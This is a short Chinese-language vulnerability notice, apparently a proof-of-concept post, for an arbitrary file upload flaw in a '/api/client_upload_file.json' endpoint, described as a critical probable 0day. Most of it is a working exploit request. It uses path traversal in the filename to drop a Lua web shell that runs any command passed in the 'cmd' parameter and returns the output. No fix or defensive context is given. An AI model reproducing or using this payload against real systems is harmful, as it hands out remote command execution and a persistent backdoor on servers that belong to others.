漏洞等级:严重
影响范围:未知,应该是个0day
漏洞详情:/api/client_upload_file.json 存在任意文件上传漏洞
参考POC
POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
Host: 192.168.11.210
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
Q
Referer: http://192.168.11.210
Accept-Encoding: gzip
------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx
if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end------WebKitFormBoundaryLx7ATxHThfk91oxQ--